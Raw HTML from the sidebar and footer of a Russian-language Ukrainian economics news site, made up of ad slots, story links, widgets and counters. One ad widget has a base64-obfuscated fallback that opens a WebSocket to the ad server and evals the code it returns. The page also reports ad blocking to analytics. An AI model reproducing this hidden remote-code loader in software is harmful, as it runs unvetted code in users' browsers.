class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1606-kakie-avtomobili-potreblyayut-menshe-goryuchego-obzor-rynka">Какие автомобили потребляют меньше топлива: Обзор рынка</a></p><p class="press"><a href="https://enovosty.com/publications/full/1812-universitet-nash-dom-dom-dolzhen-byt-teplym-yurist-vyacheslav-truba">«Университет — наш дом. Дом должен быть теплым», — юрист Вячеслав Труба</a></p></div><div id='div-gpt-ad-1594112815543-0'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });</script></div></br><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/901-piraty-putina-komu-dostalsya-kerchenskij-most"><img alt="Пираты Путина. Кому достался Керченский мост" src="https://enovosty.com/wp-content/uploads/2021/01/portnikov-112x81.jpg"><div>Виталий Портников</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/901-piraty-putina-komu-dostalsya-kerchenskij-most">Пираты Путина. Кому достался Керченский мост</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/901-piraty-putina-komu-dostalsya-kerchenskij-most">Столько, сколько Путин будет президентом, и столько, сколько Крым будет аннексирован, они и будут зарабатывать.</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_politics/full/3001-kurjoz-v-seti-poyavilsya-muzykalnyj-klip-parodiya-na-zelenskogo-v-stile-95-kvartala">В Сети появился музыкальный клип-пародия на Зеленского в стиле "95 квартала" (21129)</a></p><p class="press"><a href="https://enovosty.com/news_kiev/full/3001-pod-kievom-neizvestnye-rasstrelyali-marshrutku-s-lyudmi-podrobnosti">Под Киевом неизвестные расстреляли маршрутку с людьми: подробности (15764)</a></p><p class="press"><a href="https://enovosty.com/uk/news_society-ukr/full/3101-v-merezhi-zyavivsya-muzichnij-klip-parodiya-na-zelenskogo-v-stili-95-kvartalu">В Мережі з'явився музичний кліп-пародія на Зеленського в стилі "95 кварталу" (8811)</a></p></div></div></div></br><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br></br><div><a href="https://razygrali.biz/knizhnyj-klub.html" target="_blank" rel="noreferrer noopener" onclick="trackOutboundLink(this, 'Книги', 'knizhnyj-klub');"><img width="300" alt="Купить подарки" src="/wp-content/uploads/2021/02/book_1.png"></a></div></br> <div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570' data-sender='go2net'></div><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');});</script><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/ru/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div><a href="https://enovosty.com/auto/full/2701-kolesom-po-bezdorozhyu-luchshie-krossovery-i-vnedorozhniki-na-vse-sluchai-zhizni" target="_blank" rel="noreferrer noopener"><img alt="Колесом по бездорожью" src="/wp-content/uploads/2021/02/Kross.jpg"></a></div></br><div id="help" style="margin-bottom: 15px;"><a href="https://dobro.ua/" target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><br><br><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><script>jQuery(document).ready(function($){$('#slider_gallery').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery div.anythingSlider-minimalist-round span.arrow{height:170px}</style><div class="topnews_single slide gallery" style="width: 258px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery"><li><ul class="tact"><li id="li0" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=629&pid=13420" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/zdaniya/thumbs/thumbs_scarselli01.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Головокружительные здания Стефано Скарселли"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=629&pid=13420" title="Головокружительные здания Стефано Скарселли" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Головокружительные здания Стефано Скарселли</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=628&pid=13419" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/marshal1/thumbs/thumbs_micronesia20.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Тропический рай: Маршалловы острова на снимках Роберта Майкла Пула"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=628&pid=13419" title="Тропический рай: Маршалловы острова на снимках Роберта Майкла Пула" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Тропический рай: Маршалловы острова на снимках Роберта Майкла Пула</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=627&pid=13384" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/nider/thumbs/thumbs_aslaksen04.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Живописные пейзажи Норвегии"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=627&pid=13384" title="Живописные пейзажи Норвегии" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Живописные пейзажи Норвегии</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:252px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=626&pid=13375" style="height: 170px;"><img width="252" src="https://enovosty.com/wp-content/gallery/lyagushk1/thumbs/thumbs_insearchoflostfrogs17.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Редчайшие виды удивительных лягушек в фантастических фотографиях"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=626&pid=13375" title="Редчайшие виды удивительных лягушек в фантастических фотографиях" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Редчайшие виды удивительных лягушек в фантастических фотографиях</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></br><a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4834948"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4834948","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "3465563947";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div class="container"><div id="div-gpt-ad-1595961600637-0"><script>catfish('div-gpt-ad-1595961600637-0')
</script></div></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script><script type="text/javascript">if (typeof window._tx === "undefined") {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.src = "//st.hbrd.io/ssp.js";
(document.getElementsByTagName("head")[0] ||
document.getElementsByTagName("body")[0]).appendChild(s);}window._tx = window._tx || {};window._tx.cmds = window._tx.cmds || [];window._tx.cmds.push(function () {window._tx.init();});</script></body></html>